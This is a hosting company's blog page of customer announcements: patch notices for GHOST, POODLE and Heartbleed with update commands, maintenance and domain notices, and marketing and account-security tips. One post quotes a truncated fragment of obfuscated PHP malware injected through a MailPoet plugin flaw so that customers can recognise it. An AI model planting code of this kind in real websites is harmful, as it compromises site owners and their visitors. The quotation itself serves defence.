SEO Hosting Blog

Haunting Your Server: The Newly Discovered “Ghost” Vulnerability

Software security researchers have recently identified a bug in the Linux GNU C Library (shorthand: glibc) that provides hackers with the ability to take remote control of an entire system without having any prior knowledge of the system’s credentials. Qualys, a security firm out of California, identified GHOST and disclosed their discovery Tuesday. This security issue is a critical one and affects an enormous number of systems on the Internet. Due to its seriousness and its widespread possible affect, there is a large amount of media coverage that you can look to if you would like to find out more information about Ghost: <ul> <li><a href=”http://www.pcworld.com/article/2876572/ghost-vulnerability-poses-high-risk-to-linux-distributions.html”>Scary ‘Ghost’ vulnerability leaves Linux systems vulnerable to possession</a></li> <li><a href=”http://www.zdnet.com/article/critical-linux-security-hole-found/”>GHOST, a critical Linux security hole, is revealed</a></li> <li><a href=”http://arstechnica.com/security/2015/01/highly-critical-ghost-allowing-code-execution-affects-most-linux-systems/”>Highly critical “Ghost” allowing code execution affects most Linux systems</a></li> </ul> or simply do a search for “Ghost vulnerability”. We want to let you know that at this time, all shared servers, as well as Cloud VPS and Dedicated Servers that we have access to have been patched for this vulnerability. As long as you have not manually/by choice removed our access keys, your server will have been patched in our update and you don’t have anything to worry about. If you manage your own server and have <strong>removed our access</strong>, we are unable to secure your machine for you. We encourage you to patch this issue immediately, as the security issue is a critical one. If you have any questions, or would like to add our access back so that we can secure your server against this vulnerability for you, please contact support. If you would like to verify and test your server yourself, there is a <a href=”http://www.cyberciti.biz/faq/cve-2015-0235-patch-ghost-on-debian-ubuntu-fedora-centos-rhel-linux/”>pretty comprehensive article</a> over at the nixCraft blog on how to test and patch a variety of Linux Distributions.

SEOHosting Leashes Poodle

On October 14th, Google announced their engineers discovered a flaw in the design of SSL v3, and this vulnerability has been named “POODLE”. Whenever there is an announcement about security vulnerabilities that may affect our customers, we try and make sure that we can you the information so you can understand how these issues may affect you, and what steps we may be taking to address new vulnerabilities. For our hosting customers, we want to let you know that we are disabling SSL v3 on all our servers to ensure your site’s security. Most people should not experience any issues as a result of the changes we’re making – Google estimates this change will affect less than 1% of the internet as the SSL 3.0 protocol is almost 15 years old, but has remained in place to support users running older browsers. Check out Google’s Security blog for details on how Windows XP or IE6 are vulnerable to malicious code exploiting this problem. You should also take steps to protect yourself and your browser from the flaw just to be safe. If you are using IE6, you will need to update your version of IE, or consider switching to Chrome or Firefox, to access our services–and to protect yourself and the websites you visit. If you are using the latest version of Firefox, they will be disabling SSL v3 in their November 25th Firefox update by default, but you don’t have to wait for that update. Mozilla has created a plugin that will allow you to set the minimum SSL version that Firefox will accept, and you can grab it here: https://addons.mozilla.org/en-US/firefox/addon/ssl-version-control/ To turn off SSLv3 support in Internet Explorer 11: Setting -> Internet Options -> Advanced Tab -> Uncheck “SSLv3″ under “Security”.

Malware Infection Breaking WordPress Websites

There is a known malware infection caused by a serious vulnerability in the MailPoet WordPress plugin. This malicious attack attempts to slyly inject Spam into the hacked site, which is causing websites to break, and focuses predominantly on WordPress sites with outdated plugins or weak admin passwords. What It Looks Like The infected PHP code is very buggy and is corrupting legitimate website files, as well as themes and plugin files, which causes PHP errors to be displayed instead of website content: Parse error: syntax error, unexpected ‘)’ in /home/user/public_html/site/wp-config.php on line 91 After removing the infecting malware, the only way to remedy the issues is to restore the corrupted files from a backup. This is what the malware code looks like: < ?php $pblquldqei = ’5c%x7824-%x5c%x7824*!|!%x5c%x7824-%x5c%x7824%x5c%x785c%x5c%x7825j^%xq%x5c%x7825%x5?c%x7827Y%x5c%x78256<.msv%x5c%x7860ftsbqA7>q7825)3?of:opjudovg< ~%x5c%x7824!%x5c%x782421787825!|!*!***b%x5c%x7825)… If you are running MailPoet, we recommend upgrading it to the latest version. If you do not have a firewall on your website, you have to upgrade the plugin or remove it altogether to avoid more issues. Support If you aren’t able to fix the issue on your end, please don’t hesitate to contact Support. We’re happy to help.  

DDoS Announcement: Detroit 7/10/2014

We are currently experiencing a DDoS attack on our Detroit facility. This attack is part of a larger-scale attack that is affecting multiple internet routing points. More details can be seen here: http://www.akamai.com/html/technology/dataviz1.html (click on ‘Attacks’) We are continuing to work hard to remedy the situation with our Network and System Administrators. Please stand by for additional information. We’ll update you as we know more!  

.uk Domains Now Available For $15 A Year!

We are excited to announce that starting June 10th 2014 you can register .uk domains for just $15 a year! Here’s what you need to know about the registration process: If you have a unique .co.uk, .org.uk, or other similar domain, the equivalent .uk domain will be automatically reserved for you until June 10, 2019, as long as the domain remains registered. You can check a registrant’s rights with this handy lookup tool: http://www.dotuklaunch.co.uk/rights-lookup-tool. If you want to register a 2nd level .uk domain, such as ‘example.uk’, then the contact info for that domain must be an exact match to the existing equivalent third level .uk domain, like ‘example.co.uk’ or ‘example.org.uk’. If the information is not the same the registration will fail. If there is no equivalent domain with rights already existing within the .uk domain family, by registering the .co.uk you will automatically have the right to register the new .uk domain. Note: if your third level .uk domain name resides at a registrar other than OpenSRS, Nominet will email the registrant to confirm the registration. We think this new easier-to-use domain extension is a great addition to our current offerings and we’re pleased to be able to offer it to you! Please contact our Billing department for assistance with registering a new domain name, or if you have any questions regarding the registration process.

Patched: OpenSSL Heartbleed Vulnerability CVE-2014-0160

This morning we deployed an update to the OpenSSL software packages on our shared and customer servers to address a critical vulnerability. The vulnerability, dubbed “heartbleed”, is the result of improper data validation (bounds check) within a “heartbeat” feature of the OpenSSL TLS implementation. Because of this vulnerability, it is possible that a portion of active memory can be disclosed to connecting clients, which can leak sensitive information. Ultimately, this may lead to the disclosure of transaction or customer-identifiable information, which undermines the very purpose of SSL implementations for our customers and the Internet community at large. Although we make every effort to schedule updates and maintenance, the critical nature of this vulnerability prompted immediate action. We’re working hard to protect our customers and want to thank you for your understanding. What is the status of my SSL certificates? Our position is that regenerating/reissuing SSL certificates is not explicitly required and doing so would be out of an abundance of caution. Although the heartbleed vulnerability had the very real possibility to disclose the server-side private key for an SSL certificate, the ability to capture an entire SSL private key required more than just a passing interest in a specific web site. An attacker would need to conduct a targeted effort to dump thousands of memory captures using the vulnerability and piece together an SSL private certificate, a non-trivial task. Further, we have no indications at this time of any large scale attempts to compromise SSL private keys on our customer web sites, servers or network at large. We will continue to monitor our servers and networks with vigilance and if at any time we have indications that this position needs to change, we will update our customers accordingly. If you have any questions or concerns regarding this or other issues, please get in touch and we’ll get back to you as soon as possible. Vulnerability Scope: For customers that are currently running cPanel/WHM, the OpenSSL update will apply within the next 24h through daily automatic updates. To verify that the update has applied or to proactively apply it, please find details below. It is important to note, that once the OpenSSL update has been applied, Apache and/or Nginx must be restarted to ensure that the vulnerability is properly closed. Check the current OpenSSL Version: # rpm -q openssl openssl-1.0.1e-16.el6_5.7.x86_64 The patched version of OpenSSL for CentOS 6 is openssl-1.0.1e-16.el6_5.7.x86_64. The version of OpenSSL provided in CentOS 5.10 (openssl-0.9.8e-27.el5_10.1) is NOT vulnerable. The version of OpenSSL provided in CentOS 6.5 (openssl-1.0.1e-16.el6_5.4) WAS vulnerable. If you find that you are running any version other than ‘openssl-0.9.8e-27.el5_10.1′ or ‘openssl-1.0.1e-16.el6_5.7.x86_64′ then you should immediately update the OpenSSL packages: # yum update -y openssl  # /etc/init.d/httpd stop # /etc/init.d/httpd start Although we have made every effort to access and update customer systems, this may not always be possible in cases where customers may have restricted access to systems and/or are using operating systems other than RHEL/CentOS. As such, we encourage all Cloud VPS, Hybrid and Dedicated customers to verify that this vulnerability is patched with an updated OpenSSL package. Additional update information: Debian Wheezy, Jessie, Sid https://www.debian.org/security/2014/dsa-2896 # apt-get upgrade openssl Ubuntu 12.04, 12.10, 13.10 http://www.ubuntu.com/usn/usn-2165-1/ # apt-get upgrade openssl RHEL/CentOS 6.5 https://rhn.redhat.com/errata/RHSA-2014-0376.html http://lists.centos.org/pipermail/centos-announce/2014-April/020249.html # yum update openssl CentOS 5.10, OpenSSL 0.9.8 is NOT vulnerable Vulnerability Details: http://heartbleed.com/ https://www.openssl.org/news/secadv_20140407.txt https://access.redhat.com/security/cve/CVE-2014-0160 Proof of Concept Test: http://filippo.io/Heartbleed/

Important Changes To ICANN’s Registrar Accreditation Agreement

Attention SEOHosting Customers: Please read this important announcement carefully!  The following post details new regulations and procedures for ICANN’s Registrar Accreditation Agreement: VALIDATING REGISTRANT E-MAIL ADDRESSES Starting in January, the registrant contact will need to be validated upon the purchase or transfer of a domain name or if the registrant’s first name or last name has been modified. Should any of these occur, OpenSRS , our registrar, will send an email requiring an affirmative response from the registrant. Failing to receive an affirmative response from the registrant within 15 days will result in the suspension of the name. This means that the domain (and any related services) will be offline. If a registrant has already validated their contact information, this process will not be initiated. The same validation process will take place if a WHOIS Data Reminder Policy (WDRP) notice, 30 day expiration notice or 5 day expiration notice bounces. It is extremely important to ensure the WHOIS data that you provide for your domain is correct. ICANN WEBSITE REQUIREMENTS ICANN now requires that we  list the following new pieces of information on your website: • ICANN’s Registrant’s Benefits and Responsibilities • ICANN’s site for registrant education We hope that these changes in ICANN policy will have little effect on the ease in which you are able to order domain registrations or transfers. Please contact our billing department with any questions or concerns.

Dallas Network Maintenance Dec 16th 21:00 – 21:30 EST

On Monday, Dec 16th 21:00 – 21:30 EST we will be continuing maintenance on our network equipment at Dallas facility. This will include switching from our copper links to much faster and more stable fiber based links. The end result will be better scalable bandwidth and much better DDoS attack resilience. These operations are expected to be fully transparent and they shouldn’t cause any noticeable downtime. If you notice any connections issues after this maintenance is done, please contact our Support department.

Dallas Network Maintenance Dec 13th 21:00 – 21:30 EST

On Friday, Dec 13th 21:00 – 21:30 EST we will be conducting maintenance on our network equipment at Dallas facility. This will include switching from our copper links to much faster and more stable fiber based links. The end result will be better scalable bandwidth and much better DDoS attack resilience. These operations are expected to be fully transparent and they shouldn’t cause any noticeable downtime. If you notice any connections issues after this maintenance is done, please contact our Support department.

Shared Server Scheduled Maintenance

Over the next few weeks, we will be conducting scheduled maintenance on all of our shared servers. There are a number of updates occurring, including: cPanel updated from 11.34 to 11.38 New Apache 2.2.25, Percona MySQL 5.5.33, and PHP 5.3.27 as default installations PHP 5.2.17 and 5.4.19 alternate installs made available to customers. Improved Mod_Security rule sets Improved monitoring and load management capabilities Addition a Nginx Acceleration stack that will be available to customers Improved default MySQL and PHP configurations Replacement of Fantastico Deluxe with Softaculous Auto Installer For PHP, all existing users will default to 5.2.17 and all new users will default to 5.3.27. We encourage customers to use the latest PHP version available to help ensure optimal website performance and security. If you run a current version of WordPress, we recommend using PHP version 5.4. Customers that have enabled PHP version 5.4 have seen up to a 20% increase in performance. To use the respective PHP versions, please edit your htaccess entries to include one of these lines: For version 5.4: AddType application/x-httpd-php54 .php For version 5.2: AddType application/x-httpd-php52 .php For PHP 5.3, simply comment out any AddType PHP definition (if any). Our plan is to begin the maintenance on a small group of servers starting this evening and then upgrade approximately 5 servers per day until the upgrades are completed on all servers. Most upgrades will start at approximately 8 pm Eastern time. Expected downtime is approximately 20-30 minutes for web services, followed by an additional 10 minutes of cPanel inaccessibility. We expect fairly minimal disruption to customers and sites after the changes are complete. We have already rolled out these upgrades to some servers over the past month or two and have seen great results. We believe these changes will lead to much more stable and much better performing servers, and subsequently a better experience for all of our customers. If you have any questions, please do not hesitate to contact our support team. They will be happy to take a look at our schedule of upgrades and let you know when your accounts will be affected.

Dedicated Servers Are At SEO Hosting!

SEOhosting.com customers, Dedicated Hardware Hosting has arrived! New for Q3, we’re introducing 4 Dedicated Servers and New IP Space! Be the first to make the leap from Shared service to Dedicated hardware with Dedicated IP space. Take a look at our new offerings right here. We have 4 configurations, all which come bundled with IPs and you can upgrade by adding on more. We currently have availability to over 500 unique C Class IPs. All servers are standard with Xeon processors, 3.2TB of Bandwidth and the option for SSD drives.

The 2013 Digital Marketer Report and What You Can Learn From It

Recently, Experian Marketing Services issued its 2013 Digital Marketer Report, which has provided search engine marketers and small businesses alike with some interesting information. In short, the report essentially says what we’ve known all along, if you can’t climb the rankings, no one is going to click on your site. However, the report pounds the point home using some eye-opening statistics: For every Google search made, the odds are one in five that the searcher will click on a link leading to Amazon, Facebook, YouTube, Yahoo, or Wikipedia. Approximately half of the time someone searches, they click on one of the top 500 ranked sites in the world. About three-fourths of the clicks go to the top 10,000 websites in the world. What We Can Learn From the 2013 Digital Marketer Report So what exactly does that mean to you, the small business owner looking to get his head above water in the land of Google? Well, there are a few key takeaways here. If you aren’t trying to get to the top, you need to be. Do you have a plan for climbing the search rankings? If you don’t, then you won’t. And if you don’t, then you’re missing out on customers and profits…and you had better have an alternate plan. The more niche you can go, the better off you are. Search engines aren’t getting any less competitive. In fact, as the numbers suggest, it’s more competitive than ever. So if you are going after highly trafficked keywords, it’s going to prove difficult (if not impossible) to get your head above water. With that in mind, the smaller the niche you can find, the better off you are. Why? Well, there are less people fighting for those search terms. You can be a big fish in a small pond, rather than one of trillions of fish in a pond where there’s no way a fisherman’s going to catch you (how do you like that metaphor?). You need to be using those top 5 sites. You probably aren’t going to beat the top 5 sites. But you know what they say: if you can’t beat them, join them. For instance, you should be producing YouTube videos as part of your social media outreach. And you don’t necessarily have to launch some high dollar campaign. They can be simple educational webinars or whatever. Just something to get people in your industry sharing, and to get your name popping up with those YouTube videos when people are searching. Same thing goes for Wikipedia and Facebook. Get active so your pages pop up instead of someone else’s. Remember, people visit Facebook pages to find out who you are. And they go to Wikipedia because it’s a hub for all sorts of useful information. Make use of it!   What can you take away from the 2013 Digital Marketer Report?    

What is a Social Media News Release?

As social media becomes more and more entwined with daily life, it continues to change how we do business at virtually all levels. Most importantly, it has redefined marketing as we know it, and created an entire new segment of jobs (yes, I’m talking about you, guy running your company’s Twitter and Facebook accounts). Case in point—look what it’s done to press releases. What was once arguably the most bland part of a copywriter’s job, composing a third person release with the facts and nothing but the facts, has transformed into something a whole lot more complex. I’m talking about the social media news release. Is There a Big Difference Between a Social Media News Release and a Traditional Press Release? You betcha. Sure, they both provide breaking news, but the similarities pretty much stop there. Think of the difference between the two as the difference between the average guy working out at the gym and the meathead on steroids who can bench press your entire family. The social media news release is the meathead, with bulging biceps, protruding veins, and all. Thought up by the brain of SHIFT Communications principal, Todd Defren, the social media release is built to appeal to and attract media reps online. It takes into account all social media-related tools at their disposal, and is put together in an easy-to-read, web-friendly format. Beginning with a title and single sentence summary like a traditional release, it breaks the mold with things like: Eye catching photos. Bullet point facts to get right to the point, rather than long paragraphs that require reporters to dig for information. Links to social media accounts, information sources, and company blogs. Embed buttons to allow people to easily share your release. YouTube videos embedded for quick viewing. Are There Any Cons to a Social Media News Release? The way I see it, the only negative here is that the social media release fails to replace the traditional release. Why? Because: To get all the press you want, you still need to reach out to traditional outlets. So for example, if you want to get coverage in your local newspaper, you need to send them a regular release. Many press release sites will only take traditional releases. So to get seen there, and to get those links, you have to compose a standard release for submission. But the negatives stop there. Other than those, composing a social media news release can only increase your exposure. And that’s exactly what you need for your business, right? Do you use social media news releases? Or do you stick with the traditional?     

Are You Safe from a Twitter Hacking?

With the recent hacks to Burger King’s and Jeep’s Twitter accounts, Twitter’s hacking problem has become clearer than ever. And as the linked article mentions, these aren’t the only companies to be hacked. Fox News, PayPal, and NBC News have all been hacked, and so have many other companies. You might think that because you run a small business, you’re not in danger of being hacked. You assume that the hackers only care about taking down the big boys to make a statement, but you’d be wrong. Every business (and individual) that has a Twitter account is at risk of being hacked, and we all need to be on alert. Getting hacked can cause serious problems for your company. It could cost you followers and customers, cause damage to your brand’s image, and cause false messages to be spread about your company. What can you do to reduce the odds of your company getting hacked on Twitter? Make your passwords difficult to guess—Don’t use personal information as a password, and avoid simple, obvious passwords (like “Password”…it’s not clever). Instead, choose complex passwords that are difficult to guess. Use multiple words or short phrases, include numbers, capitalize certain letters, and maybe even intentionally misspell a word. The stronger your password, the better. Don’t give your password out to anyone who doesn’t need it—The only people who should have your Twitter password are you and any individuals who also Tweet from your company account. No one else needs your password, so don’t give it out. Guard it so that it doesn’t get exposed. Change your password regularly—At the very least, you should change your password every 2 months. If you want to change it more often, go for it. Updating your password regularly can reduce the chances of your profile getting hacked. Pay attention to where you login—Chances are that you login to your Twitter account through a variety of sources. You might login directly on the website, from your mobile phone, or through an app like TweetDeck. Only use reputable apps to login, and always pay attention to the URL when logging in on the web to make sure you’re actually on the Twitter site and not a bogus third-party login screen. Change your password after firing an employee—If you have to let an employee go (particularly one who had access to your Twitter profile, but any employee just in case), you should change your password immediately. You don’t want a bitter ex-employee to get on your Twitter page and post harmful stuff about your company.   What are some other ways to avoid getting hacked on Twitter? Share your best tips by commenting below.

Recommended Content